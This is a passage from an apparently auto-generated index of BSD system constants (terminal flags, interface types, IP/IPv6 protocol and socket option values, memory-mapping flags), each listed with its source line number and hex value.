HW_MACHINE (line 579) | HW_MACHINE = 0x1 constant ICANON (line 580) | ICANON = 0x100 constant ICMP6_FILTER (line 581) | ICMP6_FILTER = 0x12 constant ICRNL (line 582) | ICRNL = 0x100 constant IEXTEN (line 583) | IEXTEN = 0x400 constant IFAN_ARRIVAL (line 584) | IFAN_ARRIVAL = 0x0 constant IFAN_DEPARTURE (line 585) | IFAN_DEPARTURE = 0x1 constant IFA_ROUTE (line 586) | IFA_ROUTE = 0x1 constant IFF_ALLMULTI (line 587) | IFF_ALLMULTI = 0x200 constant IFF_BROADCAST (line 588) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 589) | IFF_CANTCHANGE = 0x8f52 constant IFF_DEBUG (line 590) | IFF_DEBUG = 0x4 constant IFF_LINK0 (line 591) | IFF_LINK0 = 0x1000 constant IFF_LINK1 (line 592) | IFF_LINK1 = 0x2000 constant IFF_LINK2 (line 593) | IFF_LINK2 = 0x4000 constant IFF_LOOPBACK (line 594) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 595) | IFF_MULTICAST = 0x8000 constant IFF_NOARP (line 596) | IFF_NOARP = 0x80 constant IFF_NOTRAILERS (line 597) | IFF_NOTRAILERS = 0x20 constant IFF_OACTIVE (line 598) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 599) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 600) | IFF_PROMISC = 0x100 constant IFF_RUNNING (line 601) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 602) | IFF_SIMPLEX = 0x800 constant IFF_UP (line 603) | IFF_UP = 0x1 constant IFNAMSIZ (line 604) | IFNAMSIZ = 0x10 constant IFT_1822 (line 605) | IFT_1822 = 0x2 constant IFT_A12MPPSWITCH (line 606) | IFT_A12MPPSWITCH = 0x82 constant IFT_AAL2 (line 607) | IFT_AAL2 = 0xbb constant IFT_AAL5 (line 608) | IFT_AAL5 = 0x31 constant IFT_ADSL (line 609) | IFT_ADSL = 0x5e constant IFT_AFLANE8023 (line 610) | IFT_AFLANE8023 = 0x3b constant IFT_AFLANE8025 (line 611) | IFT_AFLANE8025 = 0x3c constant IFT_ARAP (line 612) | IFT_ARAP = 0x58 constant IFT_ARCNET (line 613) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 614) | IFT_ARCNETPLUS = 0x24 constant IFT_ASYNC (line 615) | IFT_ASYNC = 0x54 constant IFT_ATM (line 616) | IFT_ATM = 0x25 constant IFT_ATMDXI (line 617) | IFT_ATMDXI = 0x69 constant IFT_ATMFUNI (line 618) | IFT_ATMFUNI = 0x6a constant IFT_ATMIMA (line 619) | IFT_ATMIMA = 0x6b constant IFT_ATMLOGICAL (line 620) | IFT_ATMLOGICAL = 0x50 constant IFT_ATMRADIO (line 621) | IFT_ATMRADIO = 0xbd constant IFT_ATMSUBINTERFACE (line 622) | IFT_ATMSUBINTERFACE = 0x86 constant IFT_ATMVCIENDPT (line 623) | IFT_ATMVCIENDPT = 0xc2 constant IFT_ATMVIRTUAL (line 624) | IFT_ATMVIRTUAL = 0x95 constant IFT_BGPPOLICYACCOUNTING (line 625) | IFT_BGPPOLICYACCOUNTING = 0xa2 constant IFT_BRIDGE (line 626) | IFT_BRIDGE = 0xd1 constant IFT_BSC (line 627) | IFT_BSC = 0x53 constant IFT_CARP (line 628) | IFT_CARP = 0xf8 constant IFT_CCTEMUL (line 629) | IFT_CCTEMUL = 0x3d constant IFT_CEPT (line 630) | IFT_CEPT = 0x13 constant IFT_CES (line 631) | IFT_CES = 0x85 constant IFT_CHANNEL (line 632) | IFT_CHANNEL = 0x46 constant IFT_CNR (line 633) | IFT_CNR = 0x55 constant IFT_COFFEE (line 634) | IFT_COFFEE = 0x84 constant IFT_COMPOSITELINK (line 635) | IFT_COMPOSITELINK = 0x9b constant IFT_DCN (line 636) | IFT_DCN = 0x8d constant IFT_DIGITALPOWERLINE (line 637) | IFT_DIGITALPOWERLINE = 0x8a constant IFT_DIGITALWRAPPEROVERHEADCHANNEL (line 638) | IFT_DIGITALWRAPPEROVERHEADCHANNEL = 0xba constant IFT_DLSW (line 639) | IFT_DLSW = 0x4a constant IFT_DOCSCABLEDOWNSTREAM (line 640) | IFT_DOCSCABLEDOWNSTREAM = 0x80 constant IFT_DOCSCABLEMACLAYER (line 641) | IFT_DOCSCABLEMACLAYER = 0x7f constant IFT_DOCSCABLEUPSTREAM (line 642) | IFT_DOCSCABLEUPSTREAM = 0x81 constant IFT_DOCSCABLEUPSTREAMCHANNEL (line 643) | IFT_DOCSCABLEUPSTREAMCHANNEL = 0xcd constant IFT_DS0 (line 644) | IFT_DS0 = 0x51 constant IFT_DS0BUNDLE (line 645) | IFT_DS0BUNDLE = 0x52 constant IFT_DS1FDL (line 646) | IFT_DS1FDL = 0xaa constant IFT_DS3 (line 647) | IFT_DS3 = 0x1e constant IFT_DTM (line 648) | IFT_DTM = 0x8c constant IFT_DVBASILN (line 649) | IFT_DVBASILN = 0xac constant IFT_DVBASIOUT (line 650) | IFT_DVBASIOUT = 0xad constant IFT_DVBRCCDOWNSTREAM (line 651) | IFT_DVBRCCDOWNSTREAM = 0x93 constant IFT_DVBRCCMACLAYER (line 652) | IFT_DVBRCCMACLAYER = 0x92 constant IFT_DVBRCCUPSTREAM (line 653) | IFT_DVBRCCUPSTREAM = 0x94 constant IFT_ECONET (line 654) | IFT_ECONET = 0xce constant IFT_EON (line 655) | IFT_EON = 0x19 constant IFT_EPLRS (line 656) | IFT_EPLRS = 0x57 constant IFT_ESCON (line 657) | IFT_ESCON = 0x49 constant IFT_ETHER (line 658) | IFT_ETHER = 0x6 constant IFT_FAITH (line 659) | IFT_FAITH = 0xf2 constant IFT_FAST (line 660) | IFT_FAST = 0x7d constant IFT_FASTETHER (line 661) | IFT_FASTETHER = 0x3e constant IFT_FASTETHERFX (line 662) | IFT_FASTETHERFX = 0x45 constant IFT_FDDI (line 663) | IFT_FDDI = 0xf constant IFT_FIBRECHANNEL (line 664) | IFT_FIBRECHANNEL = 0x38 constant IFT_FRAMERELAYINTERCONNECT (line 665) | IFT_FRAMERELAYINTERCONNECT = 0x3a constant IFT_FRAMERELAYMPI (line 666) | IFT_FRAMERELAYMPI = 0x5c constant IFT_FRDLCIENDPT (line 667) | IFT_FRDLCIENDPT = 0xc1 constant IFT_FRELAY (line 668) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 669) | IFT_FRELAYDCE = 0x2c constant IFT_FRF16MFRBUNDLE (line 670) | IFT_FRF16MFRBUNDLE = 0xa3 constant IFT_FRFORWARD (line 671) | IFT_FRFORWARD = 0x9e constant IFT_G703AT2MB (line 672) | IFT_G703AT2MB = 0x43 constant IFT_G703AT64K (line 673) | IFT_G703AT64K = 0x42 constant IFT_GIF (line 674) | IFT_GIF = 0xf0 constant IFT_GIGABITETHERNET (line 675) | IFT_GIGABITETHERNET = 0x75 constant IFT_GR303IDT (line 676) | IFT_GR303IDT = 0xb2 constant IFT_GR303RDT (line 677) | IFT_GR303RDT = 0xb1 constant IFT_H323GATEKEEPER (line 678) | IFT_H323GATEKEEPER = 0xa4 constant IFT_H323PROXY (line 679) | IFT_H323PROXY = 0xa5 constant IFT_HDH1822 (line 680) | IFT_HDH1822 = 0x3 constant IFT_HDLC (line 681) | IFT_HDLC = 0x76 constant IFT_HDSL2 (line 682) | IFT_HDSL2 = 0xa8 constant IFT_HIPERLAN2 (line 683) | IFT_HIPERLAN2 = 0xb7 constant IFT_HIPPI (line 684) | IFT_HIPPI = 0x2f constant IFT_HIPPIINTERFACE (line 685) | IFT_HIPPIINTERFACE = 0x39 constant IFT_HOSTPAD (line 686) | IFT_HOSTPAD = 0x5a constant IFT_HSSI (line 687) | IFT_HSSI = 0x2e constant IFT_HY (line 688) | IFT_HY = 0xe constant IFT_IBM370PARCHAN (line 689) | IFT_IBM370PARCHAN = 0x48 constant IFT_IDSL (line 690) | IFT_IDSL = 0x9a constant IFT_IEEE1394 (line 691) | IFT_IEEE1394 = 0x90 constant IFT_IEEE80211 (line 692) | IFT_IEEE80211 = 0x47 constant IFT_IEEE80212 (line 693) | IFT_IEEE80212 = 0x37 constant IFT_IEEE8023ADLAG (line 694) | IFT_IEEE8023ADLAG = 0xa1 constant IFT_IFGSN (line 695) | IFT_IFGSN = 0x91 constant IFT_IMT (line 696) | IFT_IMT = 0xbe constant IFT_INFINIBAND (line 697) | IFT_INFINIBAND = 0xc7 constant IFT_INTERLEAVE (line 698) | IFT_INTERLEAVE = 0x7c constant IFT_IP (line 699) | IFT_IP = 0x7e constant IFT_IPFORWARD (line 700) | IFT_IPFORWARD = 0x8e constant IFT_IPOVERATM (line 701) | IFT_IPOVERATM = 0x72 constant IFT_IPOVERCDLC (line 702) | IFT_IPOVERCDLC = 0x6d constant IFT_IPOVERCLAW (line 703) | IFT_IPOVERCLAW = 0x6e constant IFT_IPSWITCH (line 704) | IFT_IPSWITCH = 0x4e constant IFT_ISDN (line 705) | IFT_ISDN = 0x3f constant IFT_ISDNBASIC (line 706) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 707) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISDNS (line 708) | IFT_ISDNS = 0x4b constant IFT_ISDNU (line 709) | IFT_ISDNU = 0x4c constant IFT_ISO88022LLC (line 710) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 711) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 712) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 713) | IFT_ISO88025 = 0x9 constant IFT_ISO88025CRFPINT (line 714) | IFT_ISO88025CRFPINT = 0x62 constant IFT_ISO88025DTR (line 715) | IFT_ISO88025DTR = 0x56 constant IFT_ISO88025FIBER (line 716) | IFT_ISO88025FIBER = 0x73 constant IFT_ISO88026 (line 717) | IFT_ISO88026 = 0xa constant IFT_ISUP (line 718) | IFT_ISUP = 0xb3 constant IFT_L2VLAN (line 719) | IFT_L2VLAN = 0x87 constant IFT_L3IPVLAN (line 720) | IFT_L3IPVLAN = 0x88 constant IFT_L3IPXVLAN (line 721) | IFT_L3IPXVLAN = 0x89 constant IFT_LAPB (line 722) | IFT_LAPB = 0x10 constant IFT_LAPD (line 723) | IFT_LAPD = 0x4d constant IFT_LAPF (line 724) | IFT_LAPF = 0x77 constant IFT_LINEGROUP (line 725) | IFT_LINEGROUP = 0xd2 constant IFT_LOCALTALK (line 726) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 727) | IFT_LOOP = 0x18 constant IFT_MEDIAMAILOVERIP (line 728) | IFT_MEDIAMAILOVERIP = 0x8b constant IFT_MFSIGLINK (line 729) | IFT_MFSIGLINK = 0xa7 constant IFT_MIOX25 (line 730) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 731) | IFT_MODEM = 0x30 constant IFT_MPC (line 732) | IFT_MPC = 0x71 constant IFT_MPLS (line 733) | IFT_MPLS = 0xa6 constant IFT_MPLSTUNNEL (line 734) | IFT_MPLSTUNNEL = 0x96 constant IFT_MSDSL (line 735) | IFT_MSDSL = 0x8f constant IFT_MVL (line 736) | IFT_MVL = 0xbf constant IFT_MYRINET (line 737) | IFT_MYRINET = 0x63 constant IFT_NFAS (line 738) | IFT_NFAS = 0xaf constant IFT_NSIP (line 739) | IFT_NSIP = 0x1b constant IFT_OPTICALCHANNEL (line 740) | IFT_OPTICALCHANNEL = 0xc3 constant IFT_OPTICALTRANSPORT (line 741) | IFT_OPTICALTRANSPORT = 0xc4 constant IFT_OTHER (line 742) | IFT_OTHER = 0x1 constant IFT_P10 (line 743) | IFT_P10 = 0xc constant IFT_P80 (line 744) | IFT_P80 = 0xd constant IFT_PARA (line 745) | IFT_PARA = 0x22 constant IFT_PFLOG (line 746) | IFT_PFLOG = 0xf5 constant IFT_PFSYNC (line 747) | IFT_PFSYNC = 0xf6 constant IFT_PLC (line 748) | IFT_PLC = 0xae constant IFT_PON155 (line 749) | IFT_PON155 = 0xcf constant IFT_PON622 (line 750) | IFT_PON622 = 0xd0 constant IFT_POS (line 751) | IFT_POS = 0xab constant IFT_PPP (line 752) | IFT_PPP = 0x17 constant IFT_PPPMULTILINKBUNDLE (line 753) | IFT_PPPMULTILINKBUNDLE = 0x6c constant IFT_PROPATM (line 754) | IFT_PROPATM = 0xc5 constant IFT_PROPBWAP2MP (line 755) | IFT_PROPBWAP2MP = 0xb8 constant IFT_PROPCNLS (line 756) | IFT_PROPCNLS = 0x59 constant IFT_PROPDOCSWIRELESSDOWNSTREAM (line 757) | IFT_PROPDOCSWIRELESSDOWNSTREAM = 0xb5 constant IFT_PROPDOCSWIRELESSMACLAYER (line 758) | IFT_PROPDOCSWIRELESSMACLAYER = 0xb4 constant IFT_PROPDOCSWIRELESSUPSTREAM (line 759) | IFT_PROPDOCSWIRELESSUPSTREAM = 0xb6 constant IFT_PROPMUX (line 760) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 761) | IFT_PROPVIRTUAL = 0x35 constant IFT_PROPWIRELESSP2P (line 762) | IFT_PROPWIRELESSP2P = 0x9d constant IFT_PTPSERIAL (line 763) | IFT_PTPSERIAL = 0x16 constant IFT_PVC (line 764) | IFT_PVC = 0xf1 constant IFT_Q2931 (line 765) | IFT_Q2931 = 0xc9 constant IFT_QLLC (line 766) | IFT_QLLC = 0x44 constant IFT_RADIOMAC (line 767) | IFT_RADIOMAC = 0xbc constant IFT_RADSL (line 768) | IFT_RADSL = 0x5f constant IFT_REACHDSL (line 769) | IFT_REACHDSL = 0xc0 constant IFT_RFC1483 (line 770) | IFT_RFC1483 = 0x9f constant IFT_RS232 (line 771) | IFT_RS232 = 0x21 constant IFT_RSRB (line 772) | IFT_RSRB = 0x4f constant IFT_SDLC (line 773) | IFT_SDLC = 0x11 constant IFT_SDSL (line 774) | IFT_SDSL = 0x60 constant IFT_SHDSL (line 775) | IFT_SHDSL = 0xa9 constant IFT_SIP (line 776) | IFT_SIP = 0x1f constant IFT_SIPSIG (line 777) | IFT_SIPSIG = 0xcc constant IFT_SIPTG (line 778) | IFT_SIPTG = 0xcb constant IFT_SLIP (line 779) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 780) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 781) | IFT_SMDSICIP = 0x34 constant IFT_SONET (line 782) | IFT_SONET = 0x27 constant IFT_SONETOVERHEADCHANNEL (line 783) | IFT_SONETOVERHEADCHANNEL = 0xb9 constant IFT_SONETPATH (line 784) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 785) | IFT_SONETVT = 0x33 constant IFT_SRP (line 786) | IFT_SRP = 0x97 constant IFT_SS7SIGLINK (line 787) | IFT_SS7SIGLINK = 0x9c constant IFT_STACKTOSTACK (line 788) | IFT_STACKTOSTACK = 0x6f constant IFT_STARLAN (line 789) | IFT_STARLAN = 0xb constant IFT_STF (line 790) | IFT_STF = 0xd7 constant IFT_T1 (line 791) | IFT_T1 = 0x12 constant IFT_TDLC (line 792) | IFT_TDLC = 0x74 constant IFT_TELINK (line 793) | IFT_TELINK = 0xc8 constant IFT_TERMPAD (line 794) | IFT_TERMPAD = 0x5b constant IFT_TR008 (line 795) | IFT_TR008 = 0xb0 constant IFT_TRANSPHDLC (line 796) | IFT_TRANSPHDLC = 0x7b constant IFT_TUNNEL (line 797) | IFT_TUNNEL = 0x83 constant IFT_ULTRA (line 798) | IFT_ULTRA = 0x1d constant IFT_USB (line 799) | IFT_USB = 0xa0 constant IFT_V11 (line 800) | IFT_V11 = 0x40 constant IFT_V35 (line 801) | IFT_V35 = 0x2d constant IFT_V36 (line 802) | IFT_V36 = 0x41 constant IFT_V37 (line 803) | IFT_V37 = 0x78 constant IFT_VDSL (line 804) | IFT_VDSL = 0x61 constant IFT_VIRTUALIPADDRESS (line 805) | IFT_VIRTUALIPADDRESS = 0x70 constant IFT_VIRTUALTG (line 806) | IFT_VIRTUALTG = 0xca constant IFT_VOICEDID (line 807) | IFT_VOICEDID = 0xd5 constant IFT_VOICEEM (line 808) | IFT_VOICEEM = 0x64 constant IFT_VOICEEMFGD (line 809) | IFT_VOICEEMFGD = 0xd3 constant IFT_VOICEENCAP (line 810) | IFT_VOICEENCAP = 0x67 constant IFT_VOICEFGDEANA (line 811) | IFT_VOICEFGDEANA = 0xd4 constant IFT_VOICEFXO (line 812) | IFT_VOICEFXO = 0x65 constant IFT_VOICEFXS (line 813) | IFT_VOICEFXS = 0x66 constant IFT_VOICEOVERATM (line 814) | IFT_VOICEOVERATM = 0x98 constant IFT_VOICEOVERCABLE (line 815) | IFT_VOICEOVERCABLE = 0xc6 constant IFT_VOICEOVERFRAMERELAY (line 816) | IFT_VOICEOVERFRAMERELAY = 0x99 constant IFT_VOICEOVERIP (line 817) | IFT_VOICEOVERIP = 0x68 constant IFT_X213 (line 818) | IFT_X213 = 0x5d constant IFT_X25 (line 819) | IFT_X25 = 0x5 constant IFT_X25DDN (line 820) | IFT_X25DDN = 0x4 constant IFT_X25HUNTGROUP (line 821) | IFT_X25HUNTGROUP = 0x7a constant IFT_X25MLP (line 822) | IFT_X25MLP = 0x79 constant IFT_X25PLE (line 823) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 824) | IFT_XETHER = 0x1a constant IGNBRK (line 825) | IGNBRK = 0x1 constant IGNCR (line 826) | IGNCR = 0x80 constant IGNPAR (line 827) | IGNPAR = 0x4 constant IMAXBEL (line 828) | IMAXBEL = 0x2000 constant INLCR (line 829) | INLCR = 0x40 constant INPCK (line 830) | INPCK = 0x10 constant IN_CLASSA_HOST (line 831) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 832) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 833) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 834) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 835) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 836) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 837) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 838) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 839) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 840) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 841) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 842) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 843) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 844) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 845) | IN_LOOPBACKNET = 0x7f constant IPPROTO_AH (line 846) | IPPROTO_AH = 0x33 constant IPPROTO_CARP (line 847) | IPPROTO_CARP = 0x70 constant IPPROTO_DONE (line 848) | IPPROTO_DONE = 0x101 constant IPPROTO_DSTOPTS (line 849) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 850) | IPPROTO_EGP = 0x8 constant IPPROTO_ENCAP (line 851) | IPPROTO_ENCAP = 0x62 constant IPPROTO_EON (line 852) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 853) | IPPROTO_ESP = 0x32 constant IPPROTO_ETHERIP (line 854) | IPPROTO_ETHERIP = 0x61 constant IPPROTO_FRAGMENT (line 855) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 856) | IPPROTO_GGP = 0x3 constant IPPROTO_GRE (line 857) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 858) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 859) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 860) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 861) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 862) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 863) | IPPROTO_IP = 0x0 constant IPPROTO_IPCOMP (line 864) | IPPROTO_IPCOMP = 0x6c constant IPPROTO_IPIP (line 865) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV4 (line 866) | IPPROTO_IPV4 = 0x4 constant IPPROTO_IPV6 (line 867) | IPPROTO_IPV6 = 0x29 constant IPPROTO_IPV6_ICMP (line 868) | IPPROTO_IPV6_ICMP = 0x3a constant IPPROTO_MAX (line 869) | IPPROTO_MAX = 0x100 constant IPPROTO_MAXID (line 870) | IPPROTO_MAXID = 0x34 constant IPPROTO_MOBILE (line 871) | IPPROTO_MOBILE = 0x37 constant IPPROTO_NONE (line 872) | IPPROTO_NONE = 0x3b constant IPPROTO_PFSYNC (line 873) | IPPROTO_PFSYNC = 0xf0 constant IPPROTO_PIM (line 874) | IPPROTO_PIM = 0x67 constant IPPROTO_PUP (line 875) | IPPROTO_PUP = 0xc constant IPPROTO_RAW (line 876) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 877) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 878) | IPPROTO_RSVP = 0x2e constant IPPROTO_TCP (line 879) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 880) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 881) | IPPROTO_UDP = 0x11 constant IPPROTO_VRRP (line 882) | IPPROTO_VRRP = 0x70 constant IPV6_CHECKSUM (line 883) | IPV6_CHECKSUM = 0x1a constant IPV6_DEFAULT_MULTICAST_HOPS (line 884) | IPV6_DEFAULT_MULTICAST_HOPS = 0x1 constant IPV6_DEFAULT_MULTICAST_LOOP (line 885) | IPV6_DEFAULT_MULTICAST_LOOP = 0x1 constant IPV6_DEFHLIM (line 886) | IPV6_DEFHLIM = 0x40 constant IPV6_DONTFRAG (line 887) | IPV6_DONTFRAG = 0x3e constant IPV6_DSTOPTS (line 888) | IPV6_DSTOPTS = 0x32 constant IPV6_FAITH (line 889) | IPV6_FAITH = 0x1d constant IPV6_FLOWINFO_MASK (line 890) | IPV6_FLOWINFO_MASK = 0xffffff0f constant IPV6_FLOWLABEL_MASK (line 891) | IPV6_FLOWLABEL_MASK = 0xffff0f00 constant IPV6_FRAGTTL (line 892) | IPV6_FRAGTTL = 0x78 constant IPV6_HLIMDEC (line 893) | IPV6_HLIMDEC = 0x1 constant IPV6_HOPLIMIT (line 894) | IPV6_HOPLIMIT = 0x2f constant IPV6_HOPOPTS (line 895) | IPV6_HOPOPTS = 0x31 constant IPV6_IPSEC_POLICY (line 896) | IPV6_IPSEC_POLICY = 0x1c constant IPV6_JOIN_GROUP (line 897) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 898) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MAXHLIM (line 899) | IPV6_MAXHLIM = 0xff constant IPV6_MAXPACKET (line 900) | IPV6_MAXPACKET = 0xffff constant IPV6_MMTU (line 901) | IPV6_MMTU = 0x500 constant IPV6_MULTICAST_HOPS (line 902) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 903) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 904) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 905) | IPV6_NEXTHOP = 0x30 constant IPV6_PATHMTU (line 906) | IPV6_PATHMTU = 0x2c constant IPV6_PKTINFO (line 907) | IPV6_PKTINFO = 0x2e constant IPV6_PORTRANGE (line 908) | IPV6_PORTRANGE = 0xe constant IPV6_PORTRANGE_DEFAULT (line 909) | IPV6_PORTRANGE_DEFAULT = 0x0 constant IPV6_PORTRANGE_HIGH (line 910) | IPV6_PORTRANGE_HIGH = 0x1 constant IPV6_PORTRANGE_LOW (line 911) | IPV6_PORTRANGE_LOW = 0x2 constant IPV6_RECVDSTOPTS (line 912) | IPV6_RECVDSTOPTS = 0x28 constant IPV6_RECVHOPLIMIT (line 913) | IPV6_RECVHOPLIMIT = 0x25 constant IPV6_RECVHOPOPTS (line 914) | IPV6_RECVHOPOPTS = 0x27 constant IPV6_RECVPATHMTU (line 915) | IPV6_RECVPATHMTU = 0x2b constant IPV6_RECVPKTINFO (line 916) | IPV6_RECVPKTINFO = 0x24 constant IPV6_RECVRTHDR (line 917) | IPV6_RECVRTHDR = 0x26 constant IPV6_RECVTCLASS (line 918) | IPV6_RECVTCLASS = 0x39 constant IPV6_RTHDR (line 919) | IPV6_RTHDR = 0x33 constant IPV6_RTHDRDSTOPTS (line 920) | IPV6_RTHDRDSTOPTS = 0x23 constant IPV6_RTHDR_LOOSE (line 921) | IPV6_RTHDR_LOOSE = 0x0 constant IPV6_RTHDR_STRICT (line 922) | IPV6_RTHDR_STRICT = 0x1 constant IPV6_RTHDR_TYPE_0 (line 923) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_SOCKOPT_RESERVED1 (line 924) | IPV6_SOCKOPT_RESERVED1 = 0x3 constant IPV6_TCLASS (line 925) | IPV6_TCLASS = 0x3d constant IPV6_UNICAST_HOPS (line 926) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 927) | IPV6_USE_MIN_MTU = 0x2a constant IPV6_V6ONLY (line 928) | IPV6_V6ONLY = 0x1b constant IPV6_VERSION (line 929) | IPV6_VERSION = 0x60 constant IPV6_VERSION_MASK (line 930) | IPV6_VERSION_MASK = 0xf0 constant IP_ADD_MEMBERSHIP (line 931) | IP_ADD_MEMBERSHIP = 0xc constant IP_DEFAULT_MULTICAST_LOOP (line 932) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 933) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 934) | IP_DF = 0x4000 constant IP_DROP_MEMBERSHIP (line 935) | IP_DROP_MEMBERSHIP = 0xd constant IP_EF (line 936) | IP_EF = 0x8000 constant IP_ERRORMTU (line 937) | IP_ERRORMTU = 0x15 constant IP_HDRINCL (line 938) | IP_HDRINCL = 0x2 constant IP_IPSEC_POLICY (line 939) | IP_IPSEC_POLICY = 0x16 constant IP_MAXPACKET (line 940) | IP_MAXPACKET = 0xffff constant IP_MAX_MEMBERSHIPS (line 941) | IP_MAX_MEMBERSHIPS = 0x14 constant IP_MF (line 942) | IP_MF = 0x2000 constant IP_MINFRAGSIZE (line 943) | IP_MINFRAGSIZE = 0x45 constant IP_MINTTL (line 944) | IP_MINTTL = 0x18 constant IP_MSS (line 945) | IP_MSS = 0x240 constant IP_MULTICAST_IF (line 946) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 947) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 948) | IP_MULTICAST_TTL = 0xa constant IP_OFFMASK (line 949) | IP_OFFMASK = 0x1fff constant IP_OPTIONS (line 950) | IP_OPTIONS = 0x1 constant IP_PORTRANGE (line 951) | IP_PORTRANGE = 0x13 constant IP_PORTRANGE_DEFAULT (line 952) | IP_PORTRANGE_DEFAULT = 0x0 constant IP_PORTRANGE_HIGH (line 953) | IP_PORTRANGE_HIGH = 0x1 constant IP_PORTRANGE_LOW (line 954) | IP_PORTRANGE_LOW = 0x2 constant IP_RECVDSTADDR (line 955) | IP_RECVDSTADDR = 0x7 constant IP_RECVIF (line 956) | IP_RECVIF = 0x14 constant IP_RECVOPTS (line 957) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 958) | IP_RECVRETOPTS = 0x6 constant IP_RECVTTL (line 959) | IP_RECVTTL = 0x17 constant IP_RETOPTS (line 960) | IP_RETOPTS = 0x8 constant IP_RF (line 961) | IP_RF = 0x8000 constant IP_TOS (line 962) | IP_TOS = 0x3 constant IP_TTL (line 963) | IP_TTL = 0x4 constant ISIG (line 964) | ISIG = 0x80 constant ISTRIP (line 965) | ISTRIP = 0x20 constant IXANY (line 966) | IXANY = 0x800 constant IXOFF (line 967) | IXOFF = 0x400 constant IXON (line 968) | IXON = 0x200 constant KERN_HOSTNAME (line 969) | KERN_HOSTNAME = 0xa constant KERN_OSRELEASE (line 970) | KERN_OSRELEASE = 0x2 constant KERN_OSTYPE (line 971) | KERN_OSTYPE = 0x1 constant KERN_VERSION (line 972) | KERN_VERSION = 0x4 constant LOCK_EX (line 973) | LOCK_EX = 0x2 constant LOCK_NB (line 974) | LOCK_NB = 0x4 constant LOCK_SH (line 975) | LOCK_SH = 0x1 constant LOCK_UN (line 976) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 977) | MADV_DONTNEED = 0x4 constant MADV_FREE (line 978) | MADV_FREE = 0x6 constant MADV_NORMAL (line 979) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 980) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 981) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 982) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 983) | MADV_WILLNEED = 0x3 constant MAP_ALIGNMENT_16MB (line 984) | MAP_ALIGNMENT_16MB = 0x18000000 constant MAP_ALIGNMENT_1TB (line 985) | MAP_ALIGNMENT_1TB = 0x28000000 constant MAP_ALIGNMENT_256TB (line 986) | MAP_ALIGNMENT_256TB = 0x30000000 constant MAP_ALIGNMENT_4GB (line 987) | MAP_ALIGNMENT_4GB = 0x20000000 constant MAP_ALIGNMENT_64KB (line 988) | MAP_ALIGNMENT_64KB = 0x10000000 constant MAP_ALIGNMENT_64PB (line 989) | MAP_ALIGNMENT_64PB = 0x38000000 constant MAP_ALIGNMENT_MASK (line 990) | MAP_ALIGNMENT_MASK = -0x1000000 constant MAP_ALIGNMENT_SHIFT (line 991) | 